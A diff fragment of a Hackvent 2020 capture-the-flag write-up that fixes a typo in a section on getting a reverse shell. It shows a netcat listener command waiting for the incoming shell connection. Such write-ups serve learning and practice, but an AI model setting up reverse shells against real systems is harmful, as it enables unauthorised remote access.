vernjan/ctf-writeups/write-ups/Hackvent2020/day15/README.md

 ### Getting a reverse shell

-The fist step is start listening for the incoming connection (in your VM):
+The first step is start listening for the incoming connection (in your VM):
 ```
 $ nc -l -v 10.13.0.6 2797
 Ncat: Version 7.91 ( https://nmap.org/ncat )